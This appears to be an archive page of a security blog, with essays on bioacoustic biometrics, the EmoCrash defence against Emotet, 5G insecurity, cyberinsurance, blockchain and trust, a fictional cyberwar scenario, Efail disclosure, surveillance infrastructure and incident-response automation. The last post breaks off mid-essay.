Latest

Yet Another Biometric: Bioacoustic Signatures

Sound waves through the body are unique enough to be a biometric:

“Modeling allowed us to infer what structures or material features of the human body actually differentiated people,” explains Joo Yong Sim, one of the ETRI researchers who conducted the study. “For example, we could see how the structure, size, and weight of the bones, as well as the stiffness of the joints, affect the bioacoustics spectrum.”

[…]

Notably, the researchers were concerned that the accuracy of this approach could diminish with time, since the human body constantly changes its cells, matrices, and fluid content. To account for this, they acquired the acoustic data of participants at three separate intervals, each 30 days apart.

“We were very surprised that people’s bioacoustics spectral pattern maintained well over time, despite the concern that the pattern would change greatly,” says Sim. “These results suggest that the bioacoustics signature reflects more anatomical features than changes in water, body temperature, or biomolecule concentration in blood that change from day to day.”

It’s not great. A 97% accuracy is worse than fingerprints and iris scans, and while they were able to reproduce the biometric in a month it almost certainly changes as we age, gain and lose weight, and so on. Still, interesting.

EDITED TO ADD: This post has been translated into Spanish.

Posted on August 21, 2020 at 6:03 AM13 Comments

Vaccine for Emotet Malware

Interesting story of a vaccine for the Emotet malware:

Through trial and error and thanks to subsequent Emotet updates that refined how the new persistence mechanism worked, Quinn was able to put together a tiny PowerShell script that exploited the registry key mechanism to crash Emotet itself.

The script, cleverly named EmoCrash, effectively scanned a user’s computer and generated a correct—but malformed—Emotet registry key.

When Quinn tried to purposely infect a clean computer with Emotet, the malformed registry key triggered a buffer overflow in Emotet’s code and crashed the malware, effectively preventing users from getting infected.

When Quinn ran EmoCrash on computers already infected with Emotet, the script would replace the good registry key with the malformed one, and when Emotet would re-check the registry key, the malware would crash as well, preventing infected hosts from communicating with the Emotet command-and-control server.

[…]

The Binary Defense team quickly realized that news about this discovery needed to be kept under complete secrecy, to prevent the Emotet gang from fixing its code, but they understood EmoCrash also needed to make its way into the hands of companies across the world.

Compared to many of today’s major cybersecurity firms, all of which have decades of history behind them, Binary Defense was founded in 2014, and despite being one of the industry’s up-and-comers, it doesn’t yet have the influence and connections to get this done without news of its discovery leaking, either by accident or because of a jealous rival.

To get this done, Binary Defense worked with Team CYMRU, a company that has a decades-long history of organizing and participating in botnet takedowns.

Working behind the scenes, Team CYMRU made sure that EmoCrash made its way into the hands of national Computer Emergency Response Teams (CERTs), which then spread it to the companies in their respective jurisdictions.

According to James Shank, Chief Architect for Team CYMRU, the company has contacts with more than 125 national and regional CERT teams, and also manages a mailing list through which it distributes sensitive information to more than 6,000 members. Furthermore, Team CYMRU also runs a biweekly group dedicated to dealing with Emotet’s latest shenanigans.

This broad and well-orchestrated effort has helped EmoCrash make its way around the globe over the course of the past six months.

[…]

Either by accident or by figuring out there was something wrong in its persistence mechanism, the Emotet gang did, eventually, changed its entire persistence mechanism on Aug. 6—exactly six months after Quinn made his initial discovery.

EmoCrash may not be useful to anyone anymore, but for six months, this tiny PowerShell script helped organizations stay ahead of malware operations—a truly rare sight in today’s cyber-security field.

Posted on August 18, 2020 at 6:03 AM17 Comments

5G Security

The security risks inherent in Chinese-made 5G networking equipment are easy to understand. Because the companies that make the equipment are subservient to the Chinese government, they could be forced to include backdoors in the hardware or software to give Beijing remote access. Eavesdropping is also a risk, although efforts to listen in would almost certainly be detectable. More insidious is the possibility that Beijing could use its access to degrade or disrupt communications services in the event of a larger geopolitical conflict. Since the internet, especially the “internet of things,” is expected to rely heavily on 5G infrastructure, potential Chinese infiltration is a serious national security threat.

But keeping untrusted companies like Huawei out of Western infrastructure isn’t enough to secure 5G. Neither is banning Chinese microchips, software, or programmers. Security vulnerabilities in the standards—­the protocols and software for 5G—­ensure that vulnerabilities will remain, regardless of who provides the hardware and software. These insecurities are a result of market forces that prioritize costs over security and of governments, including the United States, that want to preserve the option of surveillance in 5G networks. If the United States is serious about tackling the national security threats related to an insecure 5G network, it needs to rethink the extent to which it values corporate profits and government espionage over security.

To be sure, there are significant security improvements in 5G over 4G­in encryption, authentication, integrity protection, privacy, and network availability. But the enhancements aren’t enough.

The 5G security problems are threefold. First, the standards are simply too complex to implement securely. This is true for all software, but the 5G protocols offer particular difficulties. Because of how it is designed, the system blurs the wireless portion of the network connecting phones with base stations and the core portion that routes data around the world. Additionally, much of the network is virtualized, meaning that it will rely on software running on dynamically configurable hardware. This design dramatically increases the points vulnerable to attack, as does the expected massive increase in both things connected to the network and the data flying about it.

Second, there’s so much backward compatibility built into the 5G network that older vulnerabilities remain. 5G is an evolution of the decade-old 4G network, and most networks will mix generations. Without the ability to do a clean break from 4G to 5G, it will simply be impossible to improve security in some areas. Attackers may be able to force 5G systems to use more vulnerable 4G protocols, for example, and 5G networks will inherit many existing problems.

Third, the 5G standards committees missed many opportunities to improve security. Many of the new security features in 5G are optional, and network operators can choose not to implement them. The same happened with 4G; operators even ignored security features defined as mandatory in the standard because implementing them was expensive. But even worse, for 5G, development, performance, cost, and time to market were all prioritized over security, which was treated as an afterthought.

Already problems are being discovered. In November 2019, researchers published vulnerabilities that allow 5G users to be tracked in real time, be sent fake emergency alerts, or be disconnected from the 5G network altogether. And this wasn’t the first reporting to find issues in 5G protocols and implementations.

Chinese, Iranians, North Koreans, and Russians have been breaking into U.S. networks for years without having any control over the hardware, the software, or the companies that produce the devices. (And the U.S. National Security Agency, or NSA, has been breaking into foreign networks for years without having to coerce companies into deliberately adding backdoors.) Nothing in 5G prevents these activities from continuing, even increasing, in the future.

Solutions are few and far between and not very satisfying. It’s really too late to secure 5G networks. Susan Gordon, then-U.S. principal deputy director of national intelligence, had it right when she said last March: “You have to presume a dirty network.” Indeed, the United States needs to accept 5G’s insecurities and build secure systems on top of it. In some cases, doing so isn’t hard: Adding encryption to an iPhone or a messaging system like WhatsApp provides security from eavesdropping, and distributed protocols provide security from disruption­—regardless of how insecure the network they operate on is. In other cases, it’s impossible. If your smartphone is vulnerable to a downloaded exploit, it doesn’t matter how secure the networking protocols are. Often, the task will be somewhere in between these two extremes.

5G security is just one of the many areas in which near-term corporate profits prevailed against broader social good. In a capitalist free market economy, the only solution is to regulate companies, and the United States has not shown any serious appetite for that.

What’s more, U.S. intelligence agencies like the NSA rely on inadvertent insecurities for their worldwide data collection efforts, and law enforcement agencies like the FBI have even tried to introduce new ones to make their own data collection efforts easier. Again, near-term self-interest has so far triumphed over society’s long-term best interests.

In turn, rather than mustering a major effort to fix 5G, what’s most likely to happen is that the United States will muddle along with the problems the network has, as it has done for decades. Maybe things will be different with 6G, which is starting to be discussed in technical standards committees. The U.S. House of Representatives just passed a bill directing the State Department to participate in the international standards-setting process so that it is just run by telecommunications operators and more interested countries, but there is no chance of that measure becoming law.

The geopolitics of 5G are complicated, involving a lot more than security. China is subsidizing the purchase of its companies’ networking equipment in countries around the world. The technology will quickly become critical national infrastructure, and security problems will become life-threatening. Both criminal attacks and government cyber-operations will become more common and more damaging. Eventually, Washington will have do so something. That something will be difficult and expensive—­let’s hope it won’t also be too late.

This essay previously appeared in Foreign Policy.

EDITED TO ADD (1/16): Slashdot thread.

EDITED TO ADD (3/16): This essay has been translated into Spanish.

EDITED TO ADD: This essay has been translated into Portuguese.

Posted on January 14, 2020 at 7:42 AM30 Comments

Cyberinsurance and Acts of War

I had not heard about this case before. Zurich Insurance has refused to pay Mondelez International’s claim of $100 million in damages from NotPetya. It claims it is an act of war and therefore not covered. Mondelez is suing.

Those turning to cyber insurance to manage their exposure presently face significant uncertainties about its promise. First, the scope of cyber risks vastly exceeds available coverage, as cyber perils cut across most areas of commercial insurance in an unprecedented manner: direct losses to policyholders and third-party claims (clients, customers, etc.); financial, physical and IP damages; business interruption, and so on. Yet no cyber insurance policies cover this entire spectrum. Second, the scope of cyber-risk coverage under existing policies, whether traditional general liability or property policies or cyber-specific policies, is rarely comprehensive (to cover all possible cyber perils) and often unclear (i.e., it does not explicitly pertain to all manifestations of cyber perils, or it explicitly excludes some).

But it is in the public interest for Zurich and its peers to expand their role in managing cyber risk. In its ideal state, a mature cyber insurance market could go beyond simply absorbing some of the damage of cyberattacks and play a more fundamental role in engineering and managing cyber risk. It would allow analysis of data across industries to understand risk factors and develop common metrics and scalable solutions. It would allow researchers to pinpoint sources of aggregation risk, such as weak spots in widely relied-upon software and hardware platforms and services. Through its financial levers, the insurance industry can turn these insights into action, shaping private-sector behavior and promoting best practices internationally. Such systematic efforts to improve and incentivize cyber-risk management would redress the conditions that made NotPetya possible in the first place. This, in turn, would diminish the onus on governments to retaliate against attacks.

Posted on February 13, 2019 at 6:32 AM27 Comments

Blockchain and Trust

In his 2008 white paper that first proposed bitcoin, the anonymous Satoshi Nakamoto concluded with: “We have proposed a system for electronic transactions without relying on trust.” He was referring to blockchain, the system behind bitcoin cryptocurrency. The circumvention of trust is a great promise, but it’s just not true. Yes, bitcoin eliminates certain trusted intermediaries that are inherent in other payment systems like credit cards. But you still have to trust bitcoin—and everything about it.

Much has been written about blockchains and how they displace, reshape, or eliminate trust. But when you analyze both blockchain and trust, you quickly realize that there is much more hype than value. Blockchain solutions are often much worse than what they replace.

First, a caveat. By blockchain, I mean something very specific: the data structures and protocols that make up a public blockchain. These have three essential elements. The first is a distributed (as in multiple copies) but centralized (as in there’s only one) ledger, which is a way of recording what happened and in what order. This ledger is public, meaning that anyone can read it, and immutable, meaning that no one can change what happened in the past.

The second element is the consensus algorithm, which is a way to ensure all the copies of the ledger are the same. This is generally called mining; a critical part of the system is that anyone can participate. It is also distributed, meaning that you don’t have to trust any particular node in the consensus network. It can also be extremely expensive, both in data storage and in the energy required to maintain it. Bitcoin has the most expensive consensus algorithm the world has ever seen, by far.

Finally, the third element is the currency. This is some sort of digital token that has value and is publicly traded. Currency is a necessary element of a blockchain to align the incentives of everyone involved. Transactions involving these tokens are stored on the ledger.

Private blockchains are completely uninteresting. (By this, I mean systems that use the blockchain data structure but don’t have the above three elements.) In general, they have some external limitation on who can interact with the blockchain and its features. These are not anything new; they’re distributed append-only data structures with a list of individuals authorized to add to it. Consensus protocols have been studied in distributed systems for more than 60 years. Append-only data structures have been similarly well covered. They’re blockchains in name only, and—as far as I can tell—the only reason to operate one is to ride on the blockchain hype.

All three elements of a public blockchain fit together as a single network that offers new security properties. The question is: Is it actually good for anything? It’s all a matter of trust.

Trust is essential to society. As a species, humans are wired to trust one another. Society can’t function without trust, and the fact that we mostly don’t even think about it is a measure of how well trust works.

The word “trust” is loaded with many meanings. There’s personal and intimate trust. When we say we trust a friend, we mean that we trust their intentions and know that those intentions will inform their actions. There’s also the less intimate, less personal trust—we might not know someone personally, or know their motivations, but we can trust their future actions. Blockchain enables this sort of trust: We don’t know any bitcoin miners, for example, but we trust that they will follow the mining protocol and make the whole system work.

Most blockchain enthusiasts have a unnaturally narrow definition of trust. They’re fond of catchphrases like “in code we trust,” “in math we trust,” and “in crypto we trust.” This is trust as verification. But verification isn’t the same as trust.

In 2012, I wrote a book about trust and security, Liars and Outliers. In it, I listed four very general systems our species uses to incentivize trustworthy behavior. The first two are morals and reputation. The problem is that they scale only to a certain population size. Primitive systems were good enough for small communities, but larger communities required delegation, and more formalism.

The third is institutions. Institutions have rules and laws that induce people to behave according to the group norm, imposing sanctions on those who do not. In a sense, laws formalize reputation. Finally, the fourth is security systems. These are the wide varieties of security technologies we employ: door locks and tall fences, alarm systems and guards, forensics and audit systems, and so on.

These four elements work together to enable trust. Take banking, for example. Financial institutions, merchants, and individuals are all concerned with their reputations, which prevents theft and fraud. The laws and regulations surrounding every aspect of banking keep everyone in line, including backstops that limit risks in the case of fraud. And there are lots of security systems in place, from anti-counterfeiting technologies to internet-security technologies.

In his 2018 book, Blockchain and the New Architecture of Trust, Kevin Werbach outlines four different “trust architectures.” The first is peer-to-peer trust. This basically corresponds to my morals and reputational systems: pairs of people who come to trust each other. His second is leviathan trust, which corresponds to institutional trust. You can see this working in our system of contracts, which allows parties that don’t trust each other to enter into an agreement because they both trust that a government system will help resolve disputes. His third is intermediary trust. A good example is the credit card system, which allows untrusting buyers and sellers to engage in commerce. His fourth trust architecture is distributed trust. This is emergent trust in the particular security system that is blockchain.

What blockchain does is shift some of the trust in people and institutions to trust in technology. You need to trust the cryptography, the protocols, the software, the computers and the network. And you need to trust them absolutely, because they’re often single points of failure.

When that trust turns out to be misplaced, there is no recourse. If your bitcoin exchange gets hacked, you lose all of your money. If your bitcoin wallet gets hacked, you lose all of your money. If you forget your login credentials, you lose all of your money. If there’s a bug in the code of your smart contract, you lose all of your money. If someone successfully hacks the blockchain security, you lose all of your money. In many ways, trusting technology is harder than trusting people. Would you rather trust a human legal system or the details of some computer code you don’t have the expertise to audit?

Blockchain enthusiasts point to more traditional forms of trust—bank processing fees, for example—as expensive. But blockchain trust is also costly; the cost is just hidden. For bitcoin, that’s the cost of the additional bitcoin mined, the transaction fees, and the enormous environmental waste.

Blockchain doesn’t eliminate the need to trust human institutions. There will always be a big gap that can’t be addressed by technology alone. People still need to be in charge, and there is always a need for governance outside the system. This is obvious in the ongoing debate about changing the bitcoin block size, or in fixing the DAO attack against Ethereum. There’s always a need to override the rules, and there’s always a need for the ability to make permanent rules changes. As long as hard forks are a possibility—that’s when the people in charge of a blockchain step outside the system to change it—people will need to be in charge.

Any blockchain system will have to coexist with other, more conventional systems. Modern banking, for example, is designed to be reversible. Bitcoin is not. That makes it hard to make the two compatible, and the result is often an insecurity. Steve Wozniak was scammed out of $70K in bitcoin because he forgot this.

Blockchain technology is often centralized. Bitcoin might theoretically be based on distributed trust, but in practice, that’s just not true. Just about everyone using bitcoin has to trust one of the few available wallets and use one of the few available exchanges. People have to trust the software and the operating systems and the computers everything is running on. And we’ve seen attacks against wallets and exchanges. We’ve seen Trojans and phishing and password guessing. Criminals have even used flaws in the system that people use to repair their cell phones to steal bitcoin.

Moreover, in any distributed trust system, there are backdoor methods for centralization to creep back in. With bitcoin, there are only a few miners of consequence. There’s one company that provides most of the mining hardware. There are only a few dominant exchanges. To the extent that most people interact with bitcoin, it is through these centralized systems. This also allows for attacks against blockchain-based systems.

These issues are not bugs in current blockchain applications, they’re inherent in how blockchain works. Any evaluation of the security of the system has to take the whole socio-technical system into account. Too many blockchain enthusiasts focus on the technology and ignore the rest.

To the extent that people don’t use bitcoin, it’s because they don’t trust bitcoin. That has nothing to do with the cryptography or the protocols. In fact, a system where you can lose your life savings if you forget your key or download a piece of malware is not particularly trustworthy. No amount of explaining how SHA-256 works to prevent double-spending will fix that.

Similarly, to the extent that people do use blockchains, it is because they trust them. People either own bitcoin or not based on reputation; that’s true even for speculators who own bitcoin simply because they think it will make them rich quickly. People choose a wallet for their cryptocurrency, and an exchange for their transactions, based on reputation. We even evaluate and trust the cryptography that underpins blockchains based on the algorithms’ reputation.

To see how this can fail, look at the various supply-chain security systems that are using blockchain. A blockchain isn’t a necessary feature of any of them. The reasons they’re successful is that everyone has a single software platform to enter their data in. Even though the blockchain systems are built on distributed trust, people don’t necessarily accept that. For example, some companies don’t trust the IBM/Maersk system because it’s not their blockchain.

Irrational? Maybe, but that’s how trust works. It can’t be replaced by algorithms and protocols. It’s much more social than that.

Still, the idea that blockchains can somehow eliminate the need for trust persists. Recently, I received an email from a company that implemented secure messaging using blockchain. It said, in part: “Using the blockchain, as we have done, has eliminated the need for Trust.” This sentiment suggests the writer misunderstands both what blockchain does and how trust works.

Do you need a public blockchain? The answer is almost certainly no. A blockchain probably doesn’t solve the security problems you think it solves. The security problems it solves are probably not the ones you have. (Manipulating audit data is probably not your major security risk.) A false trust in blockchain can itself be a security risk. The inefficiencies, especially in scaling, are probably not worth it. I have looked at many blockchain applications, and all of them could achieve the same security properties without using a blockchain­—of course, then they wouldn’t have the cool name.

Honestly, cryptocurrencies are useless. They’re only used by speculators looking for quick riches, people who don’t like government-backed currencies, and criminals who want a black-market way to exchange money.

To answer the question of whether the blockchain is needed, ask yourself: Does the blockchain change the system of trust in any meaningful way, or just shift it around? Does it just try to replace trust with verification? Does it strengthen existing trust relationships, or try to go against them? How can trust be abused in the new system, and is this better or worse than the potential abuses in the old system? And lastly: What would your system look like if you didn’t use blockchain at all?

If you ask yourself those questions, it’s likely you’ll choose solutions that don’t use public blockchain. And that’ll be a good thing—especially when the hype dissipates.

This essay previously appeared on Wired.com.

EDITED TO ADD (2/11): Two commentaries on my essay.

I have wanted to write this essay for over a year. The impetus to finally do it came from an invite to speak at the Hyperledger Global Forum in December. This essay is a version of the talk I wrote for that event, made more accessible to a general audience.

It seems to be the season for blockchain takedowns. James Waldo has an excellent essay in Queue. And Nicholas Weaver gave a talk at the Enigma Conference, summarized here. It’s a shortened version of this talk.

EDITED TO ADD (2/17): Reddit thread.

EDITED TO ADD (3/1): Two more articles.

EDITED TO ADD (7/14/2023): This essay has been translated into Italian.

Posted on February 12, 2019 at 6:25 AM154 Comments

Future Cyberwar

A report for the Center for Strategic and International Studies looks at surprise and war. One of the report’s cyberwar scenarios is particularly compelling. It doesn’t just map cyber onto today’s tactics, but completely reimagines future tactics that include a cyber component (quote starts on page 110).

The U.S. secretary of defense had wondered this past week when the other shoe would drop. Finally, it had, though the U.S. military would be unable to respond effectively for a while.

The scope and detail of the attack, not to mention its sheer audacity, had earned the grudging respect of the secretary. Years of worry about a possible Chinese “Assassin’s Mace”—a silver bullet super-weapon capable of disabling key parts of the American military—turned out to be focused on the wrong thing.

The cyber attacks varied. Sailors stationed at the 7th Fleet’ s homeport in Japan awoke one day to find their financial accounts, and those of their dependents, empty. Checking, savings, retirement funds: simply gone. The Marines based on Okinawa were under virtual siege by the populace, whose simmering resentment at their presence had boiled over after a YouTube video posted under the account of a Marine stationed there had gone viral. The video featured a dozen Marines drunkenly gang-raping two teenaged Okinawan girls. The video was vivid, the girls’ cries heart-wrenching the cheers of Marines sickening. And all of it fake. The National Security Agency’s initial analysis of the video had uncovered digital fingerprints showing that it was a computer-assisted lie, and could prove that the Marine’s account under which it had been posted was hacked. But the damage had been done.

There was the commanding officer of Edwards Air Force Base whose Internet browser history had been posted on the squadron’s Facebook page. His command turned on him as a pervert; his weak protestations that he had not visited most of the posted links could not counter his admission that he had, in fact, trafficked some of them. Lies mixed with the truth. Soldiers at Fort Sill were at each other’s throats thanks to a series of text messages that allegedly unearthed an adultery ring on base.

The variations elsewhere were endless. Marines suddenly owed hundreds of thousands of dollars on credit lines they had never opened; sailors received death threats on their Twitter feeds; spouses and female service members had private pictures of themselves plastered across the Internet; older service members received notifications about cancerous conditions discovered in their latest physical.

Leadership was not exempt. Under the hashtag # PACOMMUSTGO a dozen women allegedly described harassment by the commander of Pacific command. Editorial writers demanded that, under the administration’s “zero tolerance” policy, he step aside while Congress held hearings.

There was not an American service member or dependent whose life had not been digitally turned upside down. In response, the secretary had declared “an operational pause,” directing units to stand down until things were sorted out.

Then, China had made its move, flooding the South China Sea with its conventional forces, enforcing a sea and air identification zone there, and blockading Taiwan. But the secretary could only respond weakly with a few air patrols and diversions of ships already at sea. Word was coming in through back channels that the Taiwanese government, suddenly stripped of its most ardent defender, was already considering capitulation.

I found this excerpt here. The author is Mark Cancian.

Posted on August 27, 2018 at 6:16 AM53 Comments

E-Mail Vulnerabilities and Disclosure

Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.

But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or—even better—stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.

Consider your encrypted e-mail insecure until this is fixed.

All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.

Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.

Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names—the e-mail vulnerability is called “Efail“—websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.

This simultaneous announcement is best for security. While it’s always possible that some organization—either government or criminal—has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.

Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.

Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser—honestly, a really bad idea—which resulted in details leaking.

After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published—and lots of press followed.

All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or—even more problematic—communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.

Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use—our phones and computers—to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.

It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet—remember Mirai from 2016?—the only way to patch it is to throw it away and buy a new one.

Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.

Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to properly use the whole time. If we could start again, we would design something better and more user friendly­but the huge number of legacy applications that use the existing standards mean that we can’t. I tell people that if they want to communicate securely with someone, to use one of the secure messaging systems: Signal, Off-the-Record, or—if having one of those two on your system is itself suspicious—WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.

This essay previously appeared on Lawfare.com.

Posted on June 4, 2018 at 6:33 AM33 Comments

Surveillance and Our Insecure Infrastructure

Since Edward Snowden revealed to the world the extent of the NSA’s global surveillance network, there has been a vigorous debate in the technological community about what its limits should be.

Less discussed is how many of these same surveillance techniques are used by other—smaller and poorer—more totalitarian countries to spy on political opponents, dissidents, human rights defenders; the press in Toronto has documented some of the many abuses, by countries like Ethiopia , the UAE, Iran, Syria, Kazakhstan , Sudan, Ecuador, Malaysia, and China.

That these countries can use network surveillance technologies to violate human rights is a shame on the world, and there’s a lot of blame to go around.

We can point to the governments that are using surveillance against their own citizens.

We can certainly blame the cyberweapons arms manufacturers that are selling those systems, and the countries—mostly European—that allow those arms manufacturers to sell those systems.

There’s a lot more the global Internet community could do to limit the availability of sophisticated Internet and telephony surveillance equipment to totalitarian governments. But I want to focus on another contributing cause to this problem: the fundamental insecurity of our digital systems that makes this a problem in the first place.

IMSI catchers are fake mobile phone towers. They allow someone to impersonate a cell network and collect information about phones in the vicinity of the device and they’re used to create lists of people who were at a particular event or near a particular location.

Fundamentally, the technology works because the phone in your pocket automatically trusts any cell tower to which it connects. There’s no security in the connection protocols between the phones and the towers.

IP intercept systems are used to eavesdrop on what people do on the Internet. Unlike the surveillance that happens at the sites you visit, by companies like Facebook and Google, this surveillance happens at the point where your computer connects to the Internet. Here, someone can eavesdrop on everything you do.

This system also exploits existing vulnerabilities in the underlying Internet communications protocols. Most of the traffic between your computer and the Internet is unencrypted, and what is encrypted is often vulnerable to man-in-the-middle attacks because of insecurities in both the Internet protocols and the encryption protocols that protect it.

There are many other examples. What they all have in common is that they are vulnerabilities in our underlying digital communications systems that allow someone—whether it’s a country’s secret police, a rival national intelligence organization, or criminal group—to break or bypass what security there is and spy on the users of these systems.

These insecurities exist for two reasons. First, they were designed in an era where computer hardware was expensive and inaccessibility was a reasonable proxy for security. When the mobile phone network was designed, faking a cell tower was an incredibly difficult technical exercise, and it was reasonable to assume that only legitimate cell providers would go to the effort of creating such towers.

At the same time, computers were less powerful and software was much slower, so adding security into the system seemed like a waste of resources. Fast forward to today: computers are cheap and software is fast, and what was impossible only a few decades ago is now easy.

The second reason is that governments use these surveillance capabilities for their own purposes. The FBI has used IMSI-catchers for years to investigate crimes. The NSA uses IP interception systems to collect foreign intelligence. Both of these agencies, as well as their counterparts in other countries, have put pressure on the standards bodies that create these systems to not implement strong security.

Of course, technology isn’t static. With time, things become cheaper and easier. What was once a secret NSA interception program or a secret FBI investigative tool becomes usable by less-capable governments and cybercriminals.

Man-in-the-middle attacks against Internet connections are a common criminal tool to steal credentials from users and hack their accounts.

IMSI-catchers are used by criminals, too. Right now, you can go onto Alibaba.com and buy your own IMSI catcher for under $2,000.

Despite their uses by democratic governments for legitimate purposes, our security would be much better served by fixing these vulnerabilities in our infrastructures.

These systems are not only used by dissidents in totalitarian countries, they’re also used by legislators, corporate executives, critical infrastructure providers, and many others in the US and elsewhere.

That we allow people to remain insecure and vulnerable is both wrongheaded and dangerous.

Earlier this month, two American legislators—Senator Ron Wyden and Rep Ted Lieu—sent a letter to the chairman of the Federal Communications Commission, demanding that he do something about the country’s insecure telecommunications infrastructure.

They pointed out that not only are insecurities rampant in the underlying protocols and systems of the telecommunications infrastructure, but also that the FCC knows about these vulnerabilities and isn’t doing anything to force the telcos to fix them.

Wyden and Lieu make the point that fixing these vulnerabilities is a matter of US national security, but it’s also a matter of international human rights. All modern communications technologies are global, and anything the US does to improve its own security will also improve security worldwide.

Yes, it means that the FBI and the NSA will have a harder job spying, but it also means that the world will be a safer and more secure place.

This essay previously appeared on AlJazeera.com.

Posted on April 17, 2017 at 6:21 AM91 Comments

Security Orchestration and Incident Response

Last month at the RSA Conference, I saw a lot of companies selling security incident response automation. Their promise was to replace people with computers ­—sometimes with the addition of machine learning or other artificial intelligence techniques ­—and to respond to attacks at computer speeds.

While this is a laudable goal, there’s a fundamental problem with doing this in the short term. You can only automate what you’re certain about, and there is still an enormous amount of uncertainty in cybersecurity. Automation has its place in incident response, but the focus needs to be on making the people effective, not on replacing them—­ security orchestration, not automation.

This isn’t just a choice of words ­—it’s a difference in philosophy. The US military went through this in the 1990s. What was called the Revolution in Military Affairs (RMA) was supposed to change how warfare was fought. Satellites, drones and battlefield sensors were supposed to give commanders unprecedented information about what was going on, while networked soldiers and weaponry would enable troops to coordinate to a degree never before possible. In short, the traditional fog of war would be replaced by perfect information, providing certainty instead of uncertainty. They, too, believed certainty would fuel automation and, in many circumstances, allow technology to replace people.

Of course, it didn’t work out that way. The US learned in Afghanistan and Iraq that there are a lot of holes in both its collection and coordination systems. Drones have their place, but they can’t replace ground troops. The advances from the RMA brought with them some enormous advantages, especially against militaries that didn’t have access to the same technologies, but never resulted in certainty. Uncertainty still rules the battlefield, and soldiers on the ground are still the only effective way to control a region of territory.

But along the way, we learned a lot about how the feeling of certainty affects military thinking. Last month, I attended a lecture on the topic by H.R. McMaster. This was before he became President Trump’s national security advisor-designate. Then, he was the director of the Army Capabilities Integration Center. His lecture touched on many topics, but at one point he talked about the failure of the RMA. He confirmed that military strategists mistakenly believed that data would give them certainty. But he took this change in thinking further, outlining the ways this belief in certainty had repercussions in how military strategists thought about modern conflict.

McMaster’s observations are directly relevant to Internet security incident response. We too have been led to believe that data will give us certainty, and we are making the same mistakes that the military did in the 1990s. In a world of uncertainty, there’s a premium on understanding, because commanders need to figure out what’s going on. In a world of certainty, knowing what’s going on becomes a simple matter of data collection.

I see this same fallacy in Internet security. Many companies exhibiting at the RSA Conference promised to collect and display more data and that the data will reveal everything. This simply isn’t true. Data does not equal information, and information does not equal understanding. We need data, but we also must prioritize understanding the data we have over collecting ever more data. Much like the problems with bulk surveillance, the “collect it all” approach provides minimal value over collecting the specific data that’s useful.

In a world of uncertainty, the focus is on execution. In a world of certainty, the focus is on planning. I see this manifesting in Internet security as well. My own Resilient Systems ­—now part of IBM Security—­ allows incident response teams to manage security incidents and intrusions. While the tool is useful for planning and testing, its real focus is always on execution.

